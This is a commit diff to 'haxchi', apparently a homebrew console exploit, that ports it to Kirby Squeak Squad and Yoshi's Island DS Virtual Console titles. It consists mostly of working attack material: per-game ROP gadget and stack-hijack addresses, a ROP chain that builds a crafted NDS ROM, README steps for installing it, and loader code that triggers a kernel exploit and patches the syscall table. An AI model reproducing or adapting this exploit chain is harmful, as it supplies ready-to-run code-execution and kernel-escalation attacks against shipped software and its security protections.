added support for kirby squeak squad/mouse attack as well as yoshis island ds

Makefile

@@ -1,18 +1,50 @@
 .PHONY := all code550.bin
 
-all: WUP-N-DAAP.nds
+all: brainage kirby yoshids brainage.zip kirby.zip yoshids.zip
 
-code550.bin:
+brainage: setup_brainage brainage.nds
+
+kirby: setup_kirby kirby.nds
+
+yoshids: setup_yoshids yoshids.nds
+
+setup_brainage:
+	rm -f *.bin
 	@cd hbl_loader && make && cd ..
+	@cp -f brainage_defs.s defines.s
 
-haxchi_rop_hook.bin haxchi_rop.bin: code550.bin haxchi_rop.s
+setup_kirby:
+	rm -f *.bin
+	@cd hbl_loader && make && cd ..
+	@cp -f kirby_defs.s defines.s
+
+setup_yoshids:
+	rm -f *.bin
+	@cd hbl_loader && make && cd ..
+	@cp -f yoshids_defs.s defines.s
+
+brainage.nds:
 	armips haxchi_rop.s
-
-WUP-N-DAAP.nds: haxchi_rop_hook.bin haxchi_rop.bin haxchi.s
 	armips haxchi.s
-	zip -JXjq9 rom.zip WUP-N-DAAP.nds
+
+kirby.nds:
+	armips haxchi_rop.s
+	armips haxchi.s
+
+yoshids.nds:
+	armips haxchi_rop.s
+	armips haxchi.s
+
+brainage.zip:
+	zip -JXjq9 brainage.zip brainage.nds
+
+kirby.zip:
+	zip -JXjq9 kirby.zip kirby.nds
+
+yoshids.zip:
+	zip -JXjq9 yoshids.zip yoshids.nds
 
 clean:
-	@rm -f *.bin WUP-N-DAAP.nds rom.zip
+	@rm -f *.bin brainage.nds brainage.zip kirby.nds kirby.zip yoshids.nds yoshids.zip
 	@cd hbl_loader && make clean && cd ..
 	@echo "all cleaned up !"

README.md

@@ -1,18 +1,25 @@
 # haxchi
 
-This is a ported version of the haxchi exploit created by smea and others for the european release of brain training.  
+This is a ported version of the haxchi exploit created by smea and others for all sorts of different ds vc games.  
 In addition to being ported it also includes a homebrew launcher loader as its payload so you can use it for a lot of things.
 
 ## install process
 
 haxchi can be very easily installed using iosuhax's wupclient. for example, if hachihachi is installed to the MLC, it suffices to do:
 ```
-  w.up("rom.zip", "/vol/storage_mlc01/usr/title/00050000/10179C00/content/0010/rom.zip")
+  w.up("rom.zip", "/vol/storage_mlc01/usr/title/00050000/YOUR_GAME_TITLE_ID/content/0010/rom.zip")
 ```
 of course, using wupclient to install haxchi permanently requires that redNAND be disabled, unless hachihachi is installed to USB, in which case it can be installed from redNAND using:
 ```
-  w.up("rom.zip", "/vol/storage_usb01/usr/title/00050000/10179C00/content/0010/rom.zip")
+  w.up("rom.zip", "/vol/storage_usb01/usr/title/00050000/YOUR_GAME_TITLE_ID/content/0010/rom.zip")
 ```
+make sure to replace YOUR_GAME_TITLE_ID with one of the following:  
+10179B00 - US Brain Age  
+10179C00 - PAL Brain Training  
+10198A00 - US Yoshi's Island DS  
+10198A00 - PAL Yoshi's Island DS  
+101A5600 - US Kirby Squeak Squad  
+101A5700 - PAL Kirby Mouse Attack  
 
 ## contents
 

brainage_defs.s

@@ -0,0 +1,41 @@
+
+FILE_NDS_NAME equ "brainage.nds"
+
+; game stack return address
+HAX_TARGET_ADDRESS equ (0x1076FAA4)
+
+HACHI_APPLICATION_PTR equ (0x10A6E038)
+
+ARM9_ROM_LOCATION equ (0x16220400)
+ARM7_ROM_MEM2_START equ (0xEBDDFC00)
+
+; constants for position calcs
+RPX_OFFSET equ (0x01800000)
+
+; rop-gadgets part 1 (used for all sorts of different things)
+LMW_R21R1xC_LWZ_R0R1x3C_MTLR_R0_ADDI_R1_x38_BLR equ (RPX_OFFSET + 0x02208F6C)
+BCTRL equ (RPX_OFFSET + 0x02208EA4)
+MTCTR_R27_ADDI_R31x2_MR_R3R31_R4R30_R5R29_R6R28_BCTRL_LMW_R26R1x18_MTLR_R1x34_ADDI_R1x30_BLR equ (RPX_OFFSET + 0x0209A500)
+LWZ_R0xAFC_MTLR_R0_ADDI_R1xAF8_BLR equ (RPX_OFFSET + 0x0209A12C)
+LWZ_R0R1x14_LWZ_R30R1x8_R31R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020A38AC)
+MR_R11R31_LMW_R26R1x8_LWZ_R0x24_MTLR_R0_ADDI_R1x20_CLRLWI_R3R11x18_BLR equ (RPX_OFFSET + 0x0216FBF0)
+LWZ_R0R11x4_R31R11xM4_MTLR_R0_MR_R1R11_BLR equ (RPX_OFFSET + 0x02279BB8)
+
+; rop-gadgets part 2 (only used to set up core 0 thread stack)
+LWZ_R3_8_R1_LWZ_R0x14_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x0206966C)
+MR_R12_R3_CMPLW_R12_R0_LI_R3_0_BEQ_ADDI_R3_R12x10_LWZ_R0_R1x14_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020A58C4)
+LWZ_R5_R1x8_CMPLW_R5_R31_BNE_MR_R3_R5_LWZ_R0_R1x1C_LWZ_R30_R1x10_MTLR_R0_LWZ_R31_R1x14_ADDI_R1x18_BLR equ (RPX_OFFSET + 0x0200B8D0)
+LWZ_R4_R1xC_STW_R12_R1x8_LWZ_R3_R1x8_LWZ_R0_R1x1C_MTLR_R0_ADDI_R1x18_BLR equ (RPX_OFFSET + 0x0207AD84)
+LWZ_R7_R1x10_LWZ_R8_R1x14_STW_R7_R31x0_STW_R8_R31x0_LWZ_R0_R1x2C_LWZ_R31_R0x24_MTLR_R0_LWZ_R30_R0x20_ADDI_R1x28_BLR equ (RPX_OFFSET + 0x0205182C)
+LWZ_R3_4_R3_LWZ_R0xC_MTLR_R0_ADDI_R1x8_BLR equ (RPX_OFFSET + 0x02014E0C)
+LWZ_R0_R1x1C_LWZ_R30_R1x10_MTLR_R0_LWZ_R31_R1x14_ADDI_R1x18_ADD_R3_R7_BLR equ (RPX_OFFSET + 0x0213FE6C)
+MTCTR_R12_BCTRL_LI_R3_0_LWZ_R0_R1x14_LWZ_R31_R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x0202028C)
+
+; functions used from game
+NERD_CREATETHREAD equ (RPX_OFFSET + 0x02223C40)
+NERD_STARTTHREAD equ (RPX_OFFSET + 0x0222405C)
+NERD_JOINTHREAD equ (RPX_OFFSET + 0x02223AEC)
+HACHI_APPLICATION_SHUTDOWNANDDESTROY equ (RPX_OFFSET + 0x02007774)
+NERD_FASTWIIU_SHUTDOWN equ (RPX_OFFSET + 0x0201BD28)
+CORE_SHUTDOWN equ (RPX_OFFSET + 0x02222FBC)
+_START_EXIT equ (RPX_OFFSET + 0x02022A70)

coreinit.s

@@ -0,0 +1,19 @@
+
+; constants for position calcs
+COREINIT_OFFSET equ (- 0xFE3C00)
+
+; coreinit gadgets
+MTCTR_R30_MR_R8R21_R7R29_R6R28_R5R27_R4R25_R3R24_BCTRL equ (COREINIT_OFFSET + 0x02002968)
+
+; coreinit functions
+OS_CREATETHREAD equ (0x02025764 + COREINIT_OFFSET)
+OS_GETTHREADAFFINITY equ (0x020266A4 + COREINIT_OFFSET)
+OS_FORCEFULLRELAUNCH equ (0x02019BA8 + COREINIT_OFFSET)
+OSCODEGEN_GETVARANGE equ (0x0201B1C0 + COREINIT_OFFSET)
+OSCODEGEN_SWITCHSECMODE equ (0x0201B2C0 + COREINIT_OFFSET)
+MEMCPY equ (0x02019BC8 + COREINIT_OFFSET)
+DC_FLUSHRANGE equ (0x02007B88 + COREINIT_OFFSET)
+IC_INVALIDATERANGE equ (0x02007CB0 + COREINIT_OFFSET)
+OSSAVESDONE_READYTORELEASE equ (0x0201D5B8 + COREINIT_OFFSET)
+OSRELEASEFOREGROUND equ (0x0201D5BC + COREINIT_OFFSET)
+OSFATAL equ (0x02015218 + COREINIT_OFFSET)

haxchi.s

@@ -1,8 +1,7 @@
-.create "WUP-N-DAAP.nds", 0
-.nds
+.include "defines.s"
+.create FILE_NDS_NAME, 0
 
-; game stack return address
-hax_target_address equ 0x1076FAA4
+.nds
 
 .org 0x000
 	.ascii "HAXCHI" ; Game Title
@@ -19,7 +18,7 @@ hax_target_address equ 0x1076FAA4
 	.word arm9_data_end - arm9_data ; ARM9 size
 	.word arm7_data ; ARM7 rom_offset
 	.word 0x2000000 ; ARM7 entry_address
-	.word 0xEBDDFC00 + hax_target_address ; ARM7 ram_address
+	.word ARM7_ROM_MEM2_START + HAX_TARGET_ADDRESS ; ARM7 ram_address
 	.word arm7_data_end - arm7_data ; ARM7 size
 
 .org 0x080

haxchi_rop.s

@@ -1,64 +1,11 @@
-
-; game stack return address
-hax_target_address equ 0x1076FAA4
-
-; constants for position calcs
-COREINIT_OFFSET equ (- 0xFE3C00)
-RPX_OFFSET equ (0x01800000)
-SYSAPP_OFFSET equ (0x01B75D00)
-
-; rop-gadgets part 1 (used for all sorts of different things)
-LMW_R21R1xC_LWZ_R0R1x3C_MTLR_R0_ADDI_R1_x38_BLR equ (RPX_OFFSET + 0x02208F6C)
-MTCTR_R28_ADDI_R6x68_MR_R5R29_R4R22_R3R21_BCTRL equ (RPX_OFFSET + 0x02208E90)
-BCTRL equ (RPX_OFFSET + 0x02208EA4)
-MTCTR_R27_ADDI_R31x2_MR_R3R31_R4R30_R5R29_R6R28_BCTRL_LMW_R26R1x18_MTLR_R1x34_ADDI_R1x30_BLR equ (RPX_OFFSET + 0x0209A500)
-LWZ_R0x104_MTLR_R0_ADDI_R1x100_BLR equ (RPX_OFFSET + 0x020E0108)
-LWZ_R0xAFC_MTLR_R0_ADDI_R1xAF8_BLR equ (RPX_OFFSET + 0x0209A12C)
-LWZ_R0R1x14_LWZ_R30R1x8_R31R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020A38AC)
-MR_R11R31_LMW_R26R1x8_LWZ_R0x24_MTLR_R0_ADDI_R1x20_CLRLWI_R3R11x18_BLR equ (RPX_OFFSET + 0x0216FBF0)
-LWZ_R0R11x4_R31R11xM4_MTLR_R0_MR_R1R11_BLR equ (RPX_OFFSET + 0x02279BB8)
-MTCTR_R30_MR_R8R21_R7R29_R6R28_R5R27_R4R25_R3R24_BCTRL equ (COREINIT_OFFSET + 0x02002968)
-
-; rop-gadgets part 2 (only used to set up core 0 thread stack)
-LWZ_R3_8_R1_LWZ_R0x14_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x0206966C)
-MR_R12_R3_CMPLW_R12_R0_LI_R3_0_BEQ_ADDI_R3_R12x10_LWZ_R0_R1x14_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020A58C4)
-LWZ_R5_R1x8_CMPLW_R5_R31_BNE_MR_R3_R5_LWZ_R0_R1x1C_LWZ_R30_R1x10_MTLR_R0_LWZ_R31_R1x14_ADDI_R1x18_BLR equ (RPX_OFFSET + 0x0200B8D0)
-LWZ_R4_R1xC_STW_R12_R1x8_LWZ_R3_R1x8_LWZ_R0_R1x1C_MTLR_R0_ADDI_R1x18_BLR equ (RPX_OFFSET + 0x0207AD84)
-LWZ_R7_R1x10_LWZ_R8_R1x14_STW_R7_R31x0_STW_R8_R31x0_LWZ_R0_R1x2C_LWZ_R31_R0x24_MTLR_R0_LWZ_R30_R0x20_ADDI_R1x28_BLR equ (RPX_OFFSET + 0x0205182C)
-LWZ_R3_4_R3_LWZ_R0xC_MTLR_R0_ADDI_R1x8_BLR equ (RPX_OFFSET + 0x02014E0C)
-LWZ_R0_R1x1C_LWZ_R30_R1x10_MTLR_R0_LWZ_R31_R1x14_ADDI_R1x18_ADD_R3_R7_BLR equ (RPX_OFFSET + 0x0213FE6C)
-MTCTR_R12_BCTRL_LI_R3_0_LWZ_R0_R1x14_LWZ_R31_R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x0202028C)
-
-; functions used from game and libraries
-NERD_CREATETHREAD equ (RPX_OFFSET + 0x02223C40)
-NERD_STARTTHREAD equ (RPX_OFFSET + 0x0222405C)
-NERD_JOINTHREAD equ (RPX_OFFSET + 0x02223AEC)
-HACHI_APPLICATION_SHUTDOWNANDDESTROY equ (RPX_OFFSET + 0x02007774)
-NERD_FASTWIIU_SHUTDOWN equ (RPX_OFFSET + 0x201BD28)
-CORE_SHUTDOWN equ (RPX_OFFSET + 0x02222FBC)
-_START_EXIT equ (RPX_OFFSET + 0x02022A70)
-
-_SYSLAUNCHMIISTUDIO equ (SYSAPP_OFFSET + 0x020019D4)
-
-OS_CREATETHREAD equ (0x02025764 + COREINIT_OFFSET)
-OS_GETTHREADAFFINITY equ (0x020266A4 + COREINIT_OFFSET)
-OS_FORCEFULLRELAUNCH equ (0x02019BA8 + COREINIT_OFFSET)
-OSCODEGEN_GETVARANGE equ (0x0201B1C0 + COREINIT_OFFSET)
-OSCODEGEN_SWITCHSECMODE equ (0x0201B2C0 + COREINIT_OFFSET)
-MEMCPY equ (0x02019BC8 + COREINIT_OFFSET)
-DC_FLUSHRANGE equ (0x02007B88 + COREINIT_OFFSET)
-IC_INVALIDATERANGE equ (0x02007CB0 + COREINIT_OFFSET)
-OSSAVESDONE_READYTORELEASE equ (0x0201D5B8 + COREINIT_OFFSET)
-OSRELEASEFOREGROUND equ (0x0201D5BC + COREINIT_OFFSET)
-OSFATAL equ (0x02015218 + COREINIT_OFFSET)
+.include "coreinit.s"
+.include "defines.s"
 
 ; more useful definitions
-CODEGEN_ADR equ 0x01800000
+CODEGEN_ADR equ (0x01800000)
 
-HACHI_APPLICATION_PTR equ (0x10A6E038)
-
-NERD_THREAD0OBJECT equ (hax_target_address - 0x1000)
-NERD_THREAD2OBJECT equ (hax_target_address - 0x2000)
+NERD_THREAD0OBJECT equ (HAX_TARGET_ADDRESS - 0x1000)
+NERD_THREAD2OBJECT equ (HAX_TARGET_ADDRESS - 0x2000)
 
 .macro set_sp,v
 	.word LWZ_R0R1x14_LWZ_R30R1x8_R31R1xC_MTLR_R0_ADDI_R1x10_BLR
@@ -155,17 +102,19 @@ NERD_THREAD2OBJECT equ (hax_target_address - 0x2000)
 
 
 ; hacked from arm7 ram offset (unsafe, game stack pointer)
-.create "haxchi_rop_hook.bin", hax_target_address
+.create "haxchi_rop_hook.bin", HAX_TARGET_ADDRESS
 .arm.big
 
 rop_hook_start:
+	;call_func BCTRL, 0x0, 0x0, 0x0, 0x0 ; infinite loop
+	;call_func OSFATAL, 0x1007E7A8, 0, 0, 0
 	; move stack pointer to safe area
 	set_sp (rop_start - 4)
 .Close
 
 
 ; original game arm9 ram offset (safe, normally arm9 code)
-.create "haxchi_rop.bin", 0x16220400
+.create "haxchi_rop.bin", ARM9_ROM_LOCATION
 .arm.big
 
 rop_start:
@@ -209,7 +158,7 @@ rop_start:
 	; prepare r31 to be a valid value for the next call
 	.word LWZ_R0R1x14_LWZ_R30R1x8_R31R1xC_MTLR_R0_ADDI_R1x10_BLR
 		.word 0xDEADBABE ; r30
-		.word (0x1076FAA4-0x3000) ; r31 (has to be valid here)
+		.word (HAX_TARGET_ADDRESS-0x3000) ; r31 (has to be valid here)
 		.word 0xDEAD0001 ; garbage
 	; loads the required value for the addition onto r3 later on
 	.word LWZ_R7_R1x10_LWZ_R8_R1x14_STW_R7_R31x0_STW_R8_R31x0_LWZ_R0_R1x2C_LWZ_R31_R0x24_MTLR_R0_LWZ_R30_R0x20_ADDI_R1x28_BLR
@@ -253,9 +202,6 @@ rop_start:
 	call_func HACHI_APPLICATION_SHUTDOWNANDDESTROY, HACHI_APPLICATION_PTR, 0, 0, 0
 	call_func CORE_SHUTDOWN, 0, 0, 0, 0
 
-	; on exit we want to go into mii studio directly
-	call_func _SYSLAUNCHMIISTUDIO, 0x0, 0x0, 0x0, 0x0
-
 	; prepare system for foreground release
 	call_func OSSAVESDONE_READYTORELEASE, 0, 0, 0, 0
 

hbl_loader/Makefile

@@ -2,10 +2,11 @@ PATH := $(DEVKITPPC)/bin:$(PATH)
 PREFIX ?= powerpc-eabi-
 CC = $(PREFIX)gcc
 AS = $(PREFIX)gcc
-CFLAGS = -std=gnu99 -Os -nostdinc -fno-builtin
+CFLAGS = -std=gnu99 -O0 -nostdinc -fno-builtin -g
 ASFLAGS = -mregnames -x assembler-with-cpp
 LD = $(PREFIX)ld
-LDFLAGS=-Ttext 1800000 --oformat binary -L$(DEVKITPPC)/lib/gcc/powerpc-eabi/4.8.2 -lgcc
+OBJCOPY = $(PREFIX)objcopy
+LDFLAGS=-Ttext 1800000 -L$(DEVKITPPC)/lib/gcc/powerpc-eabi/4.8.2 -lgcc
 OBJDUMP ?= $(PREFIX)objdump
 project	:=	.
 root	:=	$(CURDIR)
@@ -35,11 +36,13 @@ main: sd_loader.h
 	$(AS) $(ASFLAGS) -DVER=$(FIRMWARE) -c $(project)/crt0.S
 	cp -r $(root)/*.o $(build)
 	rm $(root)/*.o
-	$(LD) -s -o ../code$(FIRMWARE).bin $(build)/crt0.o `find $(build) -name "*.o" ! -name "crt0.o"` $(LDFLAGS)
+	$(LD) -o code$(FIRMWARE).elf $(build)/crt0.o `find $(build) -name "*.o" ! -name "crt0.o"` $(LDFLAGS) -Map code.map
+	$(OBJCOPY) code$(FIRMWARE).elf -O binary ../code$(FIRMWARE).bin
 
 clean:
 	rm -rf $(build)
 	rm -rf sd_loader.h
+	rm -rf code$(FIRMWARE).elf code.map
 	make clean -C sd_loader
 
 print_stats:

hbl_loader/launcher.c

@@ -41,15 +41,19 @@ extern void KernelPatches(void);
 /* ****************************************************************** */
 void __main(void)
 {
-	/* Quit ongoing menu load music */
 	unsigned int sound_handle = 0;
-	OSDynLoad_Acquire("snd_core.rpl", &sound_handle);
-	void (* AXInit)();
-	void (* AXQuit)();
-	OSDynLoad_FindExport(sound_handle, 0, "AXInit", &AXInit);
-	OSDynLoad_FindExport(sound_handle, 0, "AXQuit", &AXQuit);
-	AXInit();
-	AXQuit();
+	OSDynLoad_Acquire("sndcore2.rpl", &sound_handle);
+	if(sound_handle == 0)
+	{
+		/* Quit ongoing menu load music */
+		OSDynLoad_Acquire("snd_core.rpl", &sound_handle);
+		void (* AXInit)();
+		void (* AXQuit)();
+		OSDynLoad_FindExport(sound_handle, 0, "AXInit", &AXInit);
+		OSDynLoad_FindExport(sound_handle, 0, "AXQuit", &AXQuit);
+		AXInit();
+		AXQuit();
+	}
 
     /* Get coreinit handle and keep it in memory */
     unsigned int coreinit_handle;
@@ -82,6 +86,57 @@ void __main(void)
     if (private_data.OSEffectiveToPhysical((void *)0xa0000000) == (void *)0)
         run_kexploit(&private_data);
 
+    /* Prepare for _SYSLaunchMiiStudio thread */
+    int (*OSCreateThread)(void *thread, void *entry, int argc, void *args, unsigned int stack, unsigned int stack_size, int priority, unsigned short attr);
+    int (*OSResumeThread)(void *thread);
+    int (*OSIsThreadTerminated)(void *thread);
+
+    OSDynLoad_FindExport(coreinit_handle, 0, "OSCreateThread", &OSCreateThread);
+    OSDynLoad_FindExport(coreinit_handle, 0, "OSResumeThread", &OSResumeThread);
+    OSDynLoad_FindExport(coreinit_handle, 0, "OSIsThreadTerminated", &OSIsThreadTerminated);
+
+    /* Allocate a stack for the thread */
+    void *stack = private_data.MEMAllocFromDefaultHeapEx(0x1000, 0x20);
+    /* Create the thread variable */
+    void *thread = private_data.MEMAllocFromDefaultHeapEx(0x1000, 8);
+    if(!thread || !stack)
+		ExitFailure(&private_data, "Thread memory allocation failed. Exit and re-enter browser.");
+
+	/* Quickly find _SYSLaunchMiiStudio */
+    unsigned int sysapp_handle;
+    void (*_SYSLaunchMiiStudio)(void) = 0;
+    OSDynLoad_Acquire("sysapp.rpl", &sysapp_handle);
+    OSDynLoad_FindExport(sysapp_handle, 0, "_SYSLaunchMiiStudio", &_SYSLaunchMiiStudio);
+	if(_SYSLaunchMiiStudio == (void*)0)
+		OSFatal("_SYSLaunchMiiStudio is not there?");
+
+	/* Do _SYSLaunchMiiStudio in core 1 */
+    int ret = OSCreateThread(thread, _SYSLaunchMiiStudio, 0, (void*)0, (unsigned int)stack+0x1000, 0x1000, 0, 0x1A);
+    if (ret == 0)
+        ExitFailure(&private_data, "Failed to create thread. Exit and re-enter browser.");
+
+    /* Schedule it for execution */
+    OSResumeThread(thread);
+
+    /* Can not use OSJoinThread, which hangs for some reason, so we use a detached one and wait for it to terminate */
+    while(OSIsThreadTerminated(thread) == 0)
+    {
+        asm volatile (
+        "    nop\n"
+        "    nop\n"
+        "    nop\n"
+        "    nop\n"
+        "    nop\n"
+        "    nop\n"
+        "    nop\n"
+        "    nop\n"
+        );
+    }
+
+    /* Free thread memory and stack */
+    private_data.MEMFreeToDefaultHeap(thread);
+    private_data.MEMFreeToDefaultHeap(stack);
+
     /* setup kernel copy data syscall */
     kern_write((void*)(KERN_SYSCALL_TBL_2 + (0x25 * 4)), (unsigned int)KernelCopyData);
 

kirby_defs.s

@@ -0,0 +1,41 @@
+
+FILE_NDS_NAME equ "kirby.nds"
+
+; game stack return address
+HAX_TARGET_ADDRESS equ (0x107968AC)
+
+HACHI_APPLICATION_PTR equ (0x10c8c938)
+
+ARM9_ROM_LOCATION equ (0x1643F200)
+ARM7_ROM_MEM2_START equ (0xEBBC0E00)
+
+; constants for position calcs
+RPX_OFFSET equ (0x01800000)
+
+; rop-gadgets part 1 (used for all sorts of different things)
+LMW_R21R1xC_LWZ_R0R1x3C_MTLR_R0_ADDI_R1_x38_BLR equ (RPX_OFFSET + 0x02207084)
+BCTRL equ (RPX_OFFSET + 0x02206FBC)
+MTCTR_R27_ADDI_R31x2_MR_R3R31_R4R30_R5R29_R6R28_BCTRL_LMW_R26R1x18_MTLR_R1x34_ADDI_R1x30_BLR equ (RPX_OFFSET + 0x020A3610)
+LWZ_R0xAFC_MTLR_R0_ADDI_R1xAF8_BLR equ (RPX_OFFSET + 0x020A323C)
+LWZ_R0R1x14_LWZ_R30R1x8_R31R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020ACA38)
+MR_R11R31_LMW_R26R1x8_LWZ_R0x24_MTLR_R0_ADDI_R1x20_CLRLWI_R3R11x18_BLR equ (RPX_OFFSET + 0x02179168)
+LWZ_R0R11x4_R31R11xM4_MTLR_R0_MR_R1R11_BLR equ (RPX_OFFSET + 0x02277B44)
+
+; rop-gadgets part 2 (only used to set up core 0 thread stack)
+LWZ_R3_8_R1_LWZ_R0x14_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x02018908)
+MR_R12_R3_CMPLW_R12_R0_LI_R3_0_BEQ_ADDI_R3_R12x10_LWZ_R0_R1x14_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020AEA50)
+LWZ_R5_R1x8_CMPLW_R5_R31_BNE_MR_R3_R5_LWZ_R0_R1x1C_LWZ_R30_R1x10_MTLR_R0_LWZ_R31_R1x14_ADDI_R1x18_BLR equ (RPX_OFFSET + 0x0200F4A8)
+LWZ_R4_R1xC_STW_R12_R1x8_LWZ_R3_R1x8_LWZ_R0_R1x1C_MTLR_R0_ADDI_R1x18_BLR equ (RPX_OFFSET + 0x02082DC0)
+LWZ_R7_R1x10_LWZ_R8_R1x14_STW_R7_R31x0_STW_R8_R31x0_LWZ_R0_R1x2C_LWZ_R31_R0x24_MTLR_R0_LWZ_R30_R0x20_ADDI_R1x28_BLR equ (RPX_OFFSET + 0x0205788C)
+LWZ_R3_4_R3_LWZ_R0xC_MTLR_R0_ADDI_R1x8_BLR equ (RPX_OFFSET + 0x02018990)
+LWZ_R0_R1x1C_LWZ_R30_R1x10_MTLR_R0_LWZ_R31_R1x14_ADDI_R1x18_ADD_R3_R7_BLR equ (RPX_OFFSET + 0x021492A4)
+MTCTR_R12_BCTRL_LI_R3_0_LWZ_R0_R1x14_LWZ_R31_R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020240EC)
+
+; functions used from game
+NERD_CREATETHREAD equ (RPX_OFFSET + 0x022219E8)
+NERD_STARTTHREAD equ (RPX_OFFSET + 0x02221E04)
+NERD_JOINTHREAD equ (RPX_OFFSET + 0x02221894)
+HACHI_APPLICATION_SHUTDOWNANDDESTROY equ (RPX_OFFSET + 0x02006CC8)
+NERD_FASTWIIU_SHUTDOWN equ (RPX_OFFSET + 0x0201FB1C)
+CORE_SHUTDOWN equ (RPX_OFFSET + 0x02220D4C)
+_START_EXIT equ (RPX_OFFSET + 0x0202693C)

yoshids_defs.s

@@ -0,0 +1,41 @@
+
+FILE_NDS_NAME equ "yoshids.nds"
+
+; game stack return address
+HAX_TARGET_ADDRESS equ (0x1079B52C)
+
+HACHI_APPLICATION_PTR equ (0x10C91938)
+
+ARM9_ROM_LOCATION equ (0x16444200)
+ARM7_ROM_MEM2_START equ (0xEBBBBE00)
+
+; constants for position calcs
+RPX_OFFSET equ (0x01800000)
+
+; rop-gadgets part 1 (used for all sorts of different things)
+LMW_R21R1xC_LWZ_R0R1x3C_MTLR_R0_ADDI_R1_x38_BLR equ (RPX_OFFSET + 0x02206F7C)
+BCTRL equ (RPX_OFFSET + 0x02206EB4)
+MTCTR_R27_ADDI_R31x2_MR_R3R31_R4R30_R5R29_R6R28_BCTRL_LMW_R26R1x18_MTLR_R1x34_ADDI_R1x30_BLR equ (RPX_OFFSET + 0x020A3508)
+LWZ_R0xAFC_MTLR_R0_ADDI_R1xAF8_BLR equ (RPX_OFFSET + 0x020A3134)
+LWZ_R0R1x14_LWZ_R30R1x8_R31R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x02001068)
+MR_R11R31_LMW_R26R1x8_LWZ_R0x24_MTLR_R0_ADDI_R1x20_CLRLWI_R3R11x18_BLR equ (RPX_OFFSET + 0x02179060)
+LWZ_R0R11x4_R31R11xM4_MTLR_R0_MR_R1R11_BLR equ (RPX_OFFSET + 0x02277A3C)
+
+; rop-gadgets part 2 (only used to set up core 0 thread stack)
+LWZ_R3_8_R1_LWZ_R0x14_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x02018910)
+MR_R12_R3_CMPLW_R12_R0_LI_R3_0_BEQ_ADDI_R3_R12x10_LWZ_R0_R1x14_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020AE948)
+LWZ_R5_R1x8_CMPLW_R5_R31_BNE_MR_R3_R5_LWZ_R0_R1x1C_LWZ_R30_R1x10_MTLR_R0_LWZ_R31_R1x14_ADDI_R1x18_BLR equ (RPX_OFFSET + 0x0200F4B0)
+LWZ_R4_R1xC_STW_R12_R1x8_LWZ_R3_R1x8_LWZ_R0_R1x1C_MTLR_R0_ADDI_R1x18_BLR equ (RPX_OFFSET + 0x02082DBC)
+LWZ_R7_R1x10_LWZ_R8_R1x14_STW_R7_R31x0_STW_R8_R31x0_LWZ_R0_R1x2C_LWZ_R31_R0x24_MTLR_R0_LWZ_R30_R0x20_ADDI_R1x28_BLR equ (RPX_OFFSET + 0x02057874)
+LWZ_R3_4_R3_LWZ_R0xC_MTLR_R0_ADDI_R1x8_BLR equ (RPX_OFFSET + 0x02018998)
+LWZ_R0_R1x1C_LWZ_R30_R1x10_MTLR_R0_LWZ_R31_R1x14_ADDI_R1x18_ADD_R3_R7_BLR equ (RPX_OFFSET + 0x0214919C)
+MTCTR_R12_BCTRL_LI_R3_0_LWZ_R0_R1x14_LWZ_R31_R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020240F4)
+
+; functions used from game
+NERD_CREATETHREAD equ (RPX_OFFSET + 0x022218E0)
+NERD_STARTTHREAD equ (RPX_OFFSET + 0x02221CFC)
+NERD_JOINTHREAD equ (RPX_OFFSET + 0x0222178C)
+HACHI_APPLICATION_SHUTDOWNANDDESTROY equ (RPX_OFFSET + 0x02006CD0)
+NERD_FASTWIIU_SHUTDOWN equ (RPX_OFFSET + 0x0201FB24)
+CORE_SHUTDOWN equ (RPX_OFFSET + 0x02220C44)
+_START_EXIT equ (RPX_OFFSET + 0x02026944)